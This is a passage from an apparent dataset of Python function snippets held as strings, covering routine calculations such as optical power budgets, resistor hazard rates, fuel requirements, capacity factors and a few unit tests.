(-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def test_cpu_limitation(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict, expected_values=expected_dict\n )", "def test_optimal_thickness():\n structure = Material(input)\n assert (structure.calc_optimal_thickness() == 1.9552936422413782)", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def calculate_217f_part_stress(**attributes): # pylint: disable=R0912, R0914\n _dic_ref_temp = {\n 1: 343.0,\n 2: {\n 1: 343.0,\n 2: 343.0,\n 3: 398.0,\n 4: 398.0\n },\n 3: 298.0,\n 5: 398.0,\n 6: 298.0,\n 7: 298.0,\n 9: 358.0,\n 10: 358.0,\n 11: 313.0,\n 12: 298.0,\n 13: 358.0,\n 14: 343.0,\n 15: 343.0\n }\n _dic_factors = {\n 1: [4.5E-9, 12.0, 1.0, 0.6, 1.0, 1.0],\n 2: {\n 1: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 2: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 3: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0],\n 4: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0]\n },\n 3: [7.33E-3, 0.202, 2.6, 1.45, 0.89, 1.3],\n 5: [0.0031, 1.0, 10.0, 1.0, 1.0, 1.5],\n 6: [0.00148, 1.0, 2.0, 0.5, 1.0, 1.0],\n 7: [0.00015, 2.64, 1.0, 0.466, 1.0, 1.0],\n 8: [0.021, 0.065, 0.105, 0.0, 0.0, 0.0],\n 9: [0.0062, 1.0, 5.0, 1.0, 1.0, 1.0],\n 10: [0.0735, 1.03, 4.45, 2.74, 3.51, 1.0],\n 11: [0.0398, 0.514, 5.28, 1.44, 4.46, 1.0],\n 12: [0.0481, 0.334, 4.66, 1.47, 2.83, 1.0],\n 13: [0.019, 0.445, 7.3, 2.69, 2.46, 1.0],\n 14: [0.0246, 0.459, 9.3, 2.32, 5.3, 1.0],\n 15: [0.018, 1.0, 7.4, 2.55, 3.6, 1.0]\n }\n _dic_piQ = {\n 1: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 2: [0.03, 0.1, 0.3, 1.0, 5.0, 5.0, 15.0],\n 3: [1.0, 3.0],\n 4: [1.0, 3.0],\n 5: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 6: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 7: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 8: [1.0, 15.0],\n 9: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 10: [2.5, 5.0],\n 11: [2.0, 4.0],\n 12: [2.0, 4.0],\n 13: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 14: [2.5, 5.0],\n 15: [2.0, 4.0]\n }\n _dic_piE = {\n 1: [\n 1.0, 3.0, 8.0, 5.0, 13.0, 4.0, 5.0, 7.0, 11.0, 19.0, 0.5, 11.0,\n 27.0, 490.0\n ],\n 2: [\n 1.0, 2.0, 8.0, 4.0, 14.0, 4.0, 8.0, 10.0, 18.0, 19.0, 0.2, 10.0,\n 28.0, 510.0\n ],\n 3: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 4: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 5: [\n 1.0, 2.0, 11.0, 5.0, 18.0, 15.0, 18.0, 28.0, 35.0, 27.0, 0.8, 14.0,\n 38.0, 610.0\n ],\n 6: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.3, 13.0,\n 34.0, 610.0\n ],\n 7: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.5, 13.0,\n 34.0, 610.0\n ],\n 8: [\n 1.0, 5.0, 21.0, 11.0, 24.0, 11.0, 30.0, 16.0, 42.0, 37.0, 0.5,\n 20.0, 53.0, 950.0\n ],\n 9: [\n 1.0, 2.0, 12.0, 6.0, 20.0, 5.0, 8.0, 9.0, 15.0, 33.0, 0.5, 18.0,\n 48.0, 870.0\n ],\n 10: [\n 1.0, 2.0, 18.0, 8.0, 30.0, 8.0, 12.0, 13.0, 18.0, 53.0, 0.5, 29.0,\n 76.0, 1400.0\n ],\n 11: [\n 1.0, 2.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 12: [\n 1.0, 3.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 13: [\n 1.0, 3.0, 14.0, 6.0, 24.0, 5.0, 7.0, 12.0, 18.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ],\n 14: [\n 1.0, 2.0, 19.0, 8.0, 29.0, 40.0, 65.0, 48.0, 78.0, 46.0, 0.5, 25.0,\n 66.0, 1200.0\n ],\n 15: [\n 1.0, 3.0, 14.0, 7.0, 24.0, 6.0, 12.0, 20.0, 30.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ]\n }\n # Resistance factor (piR) dictionary of values. The key is the\n # subcategory ID. The index in the returned list is the resistance range\n # breakpoint (breakpoint values are in _lst_breakpoints below). For\n # subcategory ID 6 and 7, the specification ID selects the correct set of\n # lists, then the style ID selects the proper list of piR values and then\n # the resistance range breakpoint is used to select\n _dic_piR = {\n 1: [1.0, 1.1, 1.6, 2.5],\n 2: [1.0, 1.1, 1.6, 2.5],\n 3: [1.0, 1.2, 1.3, 3.5],\n 5: [1.0, 1.7, 3.0, 5.0],\n 6: [[[1.0, 1.0, 1.2, 1.2, 1.6, 1.6, 1.6,\n 0.0], [1.0, 1.0, 1.0, 1.2, 1.6, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.0, 1.2, 1.2, 1.2,\n 1.6], [1.0, 1.2, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0],\n [1.0, 1.6, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.1, 1.2, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0, 0.0, 0.0]],\n [[1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.2, 1.6, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.0, 2.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [1.0, 1.2, 1.4, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.6, 0.0, 0.0, 0.0], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.6, 0.0, 0.0\n ], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.2, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0],\n [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.5, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 1.6, 0.0],\n [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [\n 1.0, 1.0, 1.4, 2.4, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [\n 1.0, 1.2, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.6, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.2, 1.5, 0.0, 0.0,\n 0.0], [1.0, 1.2, 0.0, 0.0, 0.0, 0.0]]],\n 7: [[[1.0, 1.2, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.2, 1.6],\n [1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.0, 1.2, 1.6]],\n [[1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.1, 1.2, 1.4, 0.0],\n [1.0, 1.0, 1.0, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.4, 0.0]]],\n 9: [1.0, 1.4, 2.0],\n 10: [1.0, 1.1, 1.4, 2.0, 2.5, 3.5],\n 11: [1.0, 1.4, 2.0],\n 12: [1.0, 1.4, 2.0],\n 13: [1.0, 1.1, 1.2, 1.4, 1.8],\n 14: [1.0, 1.1, 1.2, 1.4, 1.8],\n 15: [1.0, 1.1, 1.2, 1.4, 1.8]\n }\n # Dictionary containing the number of element breakpoints for determining\n # the resistance factor list to use.\n _dic_breakpoints = {\n 1: [1.0E5, 1.0E6, 1.0E7],\n 2: [1.0E5, 1.0E6, 1.0E7],\n 3: [100.0, 1.0E5, 1.0E6],\n 5: [1.0E4, 1.0E5, 1.0E6],\n 6: [[500.0, 1.0E3, 5.0E3, 7.5E3, 1.0E4, 1.5E4, 2.0E4],\n [100.0, 1.0E3, 1.0E4, 1.0E5, 1.5E5, 2.0E5]],\n 7: [500.0, 1.0E3, 5.0E3, 1.0E4, 2.0E4],\n 9: [2.0E3, 5.0E3],\n 10: [1.0E4, 2.0E4, 5.0E4, 1.0E5, 2.0E5],\n 11: [2.0E3, 5.0E3],\n 12: [2.0E3, 5.0E3],\n 13: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 14: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 15: [1.0E4, 5.0E4, 2.0E5, 1.0E6]\n }\n _dic_piV = {\n 9: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 10: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 11: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 12: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 13: [1.0, 1.05, 1.2],\n 14: [1.0, 1.05, 1.2],\n 15: [1.0, 1.05, 1.2]\n }\n _dic_piC = {10: [2.0, 1.0, 3.0, 1.5], 12: [2.0, 1.0]}\n _msg = ''\n\n # Calculate the base hazard rate.\n if attributes['subcategory_id'] == 2:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']][attributes[\n 'specification_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][5]\n elif attributes['subcategory_id'] not in [4, 8]:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][5]\n\n if attributes['subcategory_id'] == 4:\n attributes['lambda_b'] = 0.00006\n elif attributes['subcategory_id'] == 8:\n attributes['lambda_b'] = _dic_factors[attributes['subcategory_id']][\n attributes['type_id'] - 1]\n else:\n attributes['lambda_b'] = _f0 * exp(_f1 * (\n (attributes['temperature_active'] + 273.0) /\n _ref_temp))**_f2 * exp(((attributes['power_ratio'] / _f3) * (\n (attributes['temperature_active'] + 273.0) / 273.0)**_f4)**_f5)\n\n if attributes['lambda_b'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: Base hazard rate is 0.0 when ' \\\n 'calculating resistor, hardware ID: ' \\\n '{0:d}'.format(attributes['hardware_id'])\n\n # Calculate the resistance factor (piR).\n if attributes['subcategory_id'] not in [4, 8]:\n _index = -1\n if attributes['subcategory_id'] == 6:\n _breaks = _dic_breakpoints[attributes['subcategory_id']][\n attributes['specification_id'] - 1]\n else:\n _breaks = _dic_breakpoints[attributes['subcategory_id']]\n\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['n_elements']\n if len(_breaks) == 1 and _diff < 0:\n break\n elif _diff >= 0:\n break\n\n if attributes['subcategory_id'] in [6, 7]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][\n attributes['specification_id'] - 1][attributes['family_id'] -\n 1][_index + 1]\n elif attributes['subcategory_id'] not in [4, 8]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][_index +\n 1]\n\n # Determine the quality factor (piQ).\n attributes['piQ'] = _dic_piQ[attributes['subcategory_id']][\n attributes['quality_id'] - 1]\n\n if attributes['piQ'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piQ is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Determine the environmental factor (piE).\n attributes['piE'] = _dic_piE[attributes['subcategory_id']][\n attributes['environment_active_id'] - 1]\n\n if attributes['piE'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piE is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Calculate the temperature factor (piT).\n if attributes['subcategory_id'] == 4:\n attributes['temperature_case'] = (attributes['temperature_active'] +\n 55.0 * attributes['power_ratio'])\n attributes['piT'] = exp(-4056.0 * (\n (1.0 / (attributes['temperature_case'] + 273.0)) - 1.0 / 298.0))\n\n # Calculate the taps factor (piTAPS).\n if attributes['subcategory_id'] in [9, 10, 11, 12, 13, 14, 15]:\n attributes['piTAPS'] = (attributes['n_elements']**1.5 / 25.0) + 0.792\n\n # Calculate the voltage factor (piV).\n if attributes['subcategory_id'] > 8:\n _index = -1\n if attributes['subcategory_id'] in [9, 10, 11, 12]:\n _breaks = [0.1, 0.2, 0.6, 0.7, 0.8, 0.9]\n elif attributes['subcategory_id'] in [13, 14, 15]:\n _breaks = [0.8, 0.9]\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['voltage_ratio']\n if len(_breaks) == 1 and _diff < 0.0:\n break\n elif _index == 0 and _diff >= 0.0:\n break\n elif _diff >= 0:\n break\n attributes['piV'] = _dic_piV[attributes['subcategory_id']][_index]\n\n # Determine the consruction class factor (piC).\n if attributes['subcategory_id'] in [10, 12]:\n attributes['piC'] = _dic_piC[attributes['subcategory_id']][\n attributes['construction_id'] - 1]\n\n # Calculate the active hazard rate.\n attributes['hazard_rate_active'] = (\n attributes['lambda_b'] * attributes['piQ'] * attributes['piE'])\n if attributes['subcategory_id'] == 4:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piT'] *\n attributes['n_elements'])\n elif attributes['subcategory_id'] in [9, 11, 13, 14, 15]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] in [10, 12]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piC'] * attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] != 8:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piR'])\n\n return attributes, _msg", "def calc_loss_heat_recovery (self):\n hr_used = self.cd['heat recovery operational']\n self.loss_heat_recovery = 0\n if hr_used:# == 'Yes':\n self.loss_heat_recovery = self.electric_diesel_reduction * \\\n (self.comp_specs['percent heat recovered'] / 100.0)\n #~ print 'self.loss_heat_recovery',self.loss_heat_recovery", "def emission_factor(sheets, vehicleClass, speedRegime, pollutant):\r\n # get bc from excel. The year is hard coded to 2015\r\n f = sheets[\"Emissiefactoren CAR-VL3.0\"]\r\n idx = f[f.iloc[:,0] == vehicleClass + speedRegime + '2015'].index\r\n if len(idx) == 0:\r\n print(\"EFError: No ef corresponds to vehicle class {} and speed type {}.\".format(vehicleClass, speedRegime))\r\n return 0\r\n return float(f['EF_' + pollutant][idx])", "def test_vm_cpu_limitation(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict,\n expected_values=expected_dict\n )", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def quick_ratio(self):\n return (\n self.current_assets - self.inventory_net) / self.current_liabilities", "def _calculate_fuel_r(self, mass):\n fuel = (mass // 3) - 2\n if fuel <= 0:\n return 0\n\n return (self._calculate_fuel_r(fuel) + fuel)", "def checkFuel(self):\n return self.maze.checkFuelCost(self.checkpoint,currentLap = self.laps) - self.timeDriving", "def capacity_factor(self, update=False,\n min_cap_fact=None, max_cap_fact=None):\n if update or self._dfs['capacity_factor'] is None:\n self._dfs['capacity_factor'] = pudl.analysis.mcoe.capacity_factor(\n self, min_cap_fact=min_cap_fact, max_cap_fact=max_cap_fact)\n return self._dfs['capacity_factor']", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def get_total_fuel_requirements_part2(mass_lst: List[int]) -> int:\n total_fuel = 0\n for mass in mass_lst:\n while True:\n if get_fuel_requirements(mass) <= 0:\n break\n else:\n mass = get_fuel_requirements(mass)\n total_fuel += mass\n return total_fuel", "def get_expected_cost(self):", "def test_efficiency(self):\n effs = self.gr.calculate_global_efficiencies()\n ans = [a/6 for a in [1.5, 2., 1.5]]\n self.assertListEqual(effs.values(), ans)\n\n E = self.gr.global_efficiency()\n self.assertEqual(E, sum(ans))\n\n v_min = (E - (1/3)) / E\n mx, v = self.gr.vulnerability()\n # the middle node (2) is the most vulnerable\n self.assertEqual(mx, (2, v_min))", "def get_additional_ball_capacity(self):\n return 999", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def test_capacity_factor(pudl_out_eia):\n print(\"\\nCalculating generator capacity factors...\")\n cf = pudl_out_eia.capacity_factor()\n print(f\" capacity_factor: {len(cf)} records\")", "def reusability(self):\n self._reusability = -0.25 * self.DCC + 0.25 * self.CAMC + 0.5 * self.CIS + 0.5 * self.DSC\n return round(self._reusability, 5)", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def calc_excess_energy (self):\n #~ print sorted(self.cd.keys())\n self.excess_energy = \\\n (self.generation_wind_proposed - self.transmission_losses) * \\\n (self.cd['percent excess energy'] / 100.0)\n #~ print 'self.excess_energy',self.excess_energy", "def load_factor_d_non_peak(self, data):\n lf_d = np.zeros((data['nr_of_fueltypes']))\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for k, fueldata in enumerate(self.rs_fuels_tot_enduses_d):\n\n average_demand = sum(fueldata) / 365 # Averae_demand = yearly demand / nr of days\n max_demand_d = max(fueldata)\n\n if max_demand_d != 0:\n lf_d[k] = average_demand / max_demand_d # Calculate load factor\n\n lf_d = lf_d * 100 # Convert load factor to %\n\n return lf_d", "def get_additional_ball_capacity(cls):\n return 999", "def calc_GT_operation_partload(wdot_W, gt_size_W, eta0, m0_exhaust_from_GT_kgpers, fuel_type):\n assert wdot_W <= gt_size_W\n\n if fuel_type == 'NG':\n exitT = CC_EXIT_T_NG\n LHV = LHV_NG\n else:\n exitT = CC_EXIT_T_BG\n LHV = LHV_BG\n\n part_load_factor = (wdot_W + 1) / gt_size_W # avoid calculation errors # TODO: reference?\n if part_load_factor < GT_MIN_PART_LOAD:\n raise ValueError('The load (', wdot_W, ')is lower than minimum part load (', gt_size_W * GT_MIN_PART_LOAD, ').')\n\n eta = (0.4089 + 0.9624 * part_load_factor - 0.3726 * part_load_factor ** 2) * eta0 # (4.12) [C. Weber, 2008]_\n # mdot = (0.9934 + 0.0066 * part_load_factor) * mdot0\n T_exhaust_GT_K = (0.7379 + 0.2621 * part_load_factor) * exitT # (4.14) [C. Weber, 2008]_\n m_fuel_kgpers = wdot_W / (eta * LHV)\n\n if fuel_type == 'NG':\n m_exhaust_GT_kgpers = (103.7 * 44E-3 + 196.2 * 18E-3 + 761.4 * 28E-3 + 200.5 * 32E-3 * (CC_AIRRATIO - 1) +\n 200.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 1.8156 # TODO: reference?\n\n else:\n m_exhaust_GT_kgpers = (98.5 * 44E-3 + 116 * 18E-3 + 436.8 * 28E-3 + 115.5 * 32E-3 * (CC_AIRRATIO - 1) + \\\n 115.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 2.754 # TODO: reference?\n\n return eta, m_exhaust_GT_kgpers, T_exhaust_GT_K, m_fuel_kgpers", "def initialize_supply(self):\n unit_count = 0\n for i in range(self.start_allocation[0 ] -1, self.start_allocation[1]):\n for j in range(len(self.capacity_list[i][1])):\n self.capacity_list[i][1][j] = 1\n unit_count += 1\n self.total_supply -= unit_count", "def test_loc_techs_resource_capacity_constraint(self, override):\n\n if override is None:\n m = build_model(\n {}, \"simple_supply_and_supply_plus,two_hours,investment_costs\"\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n assert expr.lb == 0\n assert expr.ub == np.inf\n\n else:\n m = build_model(\n {\n \"techs.test_supply_plus.constraints.resource_cap_{}\".format(\n override\n ): 10\n },\n \"simple_supply_and_supply_plus,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n if override == \"max\":\n assert expr.ub == 10\n assert expr.lb == 0\n elif override == \"equals\":\n assert expr.ub == 10\n assert expr.lb == 10\n if override == \"min\":\n assert expr.lb == 10\n assert expr.ub == np.inf", "def calculate_demand(flow, requested_sf, available_sf, service_functions):\n\n if requested_sf in available_sf:\n vnf_need_placement = False\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n return demanded_total_capacity, vnf_need_placement\n else:\n vnf_need_placement = True\n available_sf[requested_sf] = {'load': 0.0}\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n del available_sf[requested_sf]\n return demanded_total_capacity, vnf_need_placement", "def get_strength(self):\n return 10 - self.get_agility()", "def ram_condition(min_gb=3):\n return get_free_gb() < min_gb", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def test_cpu_limitation_without_guest_agent(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict, expected_values=expected_dict\n )", "def calc_lost_heat_recovery (self):\n if not self.cd['heat recovery operational']:\n\n self.lost_heat_recovery = [0]\n else:\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.lost_heat_recovery = \\\n (self.generation / gen_eff )* .10", "def required_points(self):\n req_points = self.min_performance * self.initial_available_points()\n return np.maximum(0, np.int64(np.ceil(req_points)))", "def _calc_worker_assign_limits(self, initial_count, occupied=None):\n occupied = occupied or dict()\n actual_count = initial_count - sum(occupied.values())\n\n endpoint_res = sorted(self._worker_slots.items(), key=operator.itemgetter(1),\n reverse=True)\n\n endpoints = [t[0] for t in endpoint_res]\n endpoint_cores = np.array([t[1] for t in endpoint_res]).astype(np.float32)\n\n # remove assigned nodes from limitations\n counts = initial_count * endpoint_cores / endpoint_cores.sum()\n for idx, ep in enumerate(endpoints):\n counts[idx] = max(0, counts[idx] - occupied.get(ep, 0))\n\n # all assigned, nothing to do\n if counts.sum() == 0:\n return dict((ep, 0) for ep in endpoints)\n\n counts = (actual_count * counts / counts.sum()).astype(np.int32)\n\n # assign remaining nodes\n pos = 0\n rest = actual_count - counts.sum()\n while rest > 0:\n counts[pos] += 1\n rest -= 1\n pos = (pos + 1) % len(counts)\n return dict(zip(endpoints, counts))", "def calcRMSE(inflow, demand):\n ssd = 0\n for i in range(len(inflow)):\n ssd += pow((inflow[i]-demand[i]),2)\n rmse = np.sqrt(ssd/len(inflow))\n return rmse", "def ComputeEAvailable(self):\r\n pass", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def total_demand(self) -> float:\n return self.inputs.num_customers * self.operations.m3_per_customer()", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def normalisedCPUCapacity(self):\n normCPUCapacities = map(lambda measurement: measurement.normaliseCpuCapacity(), 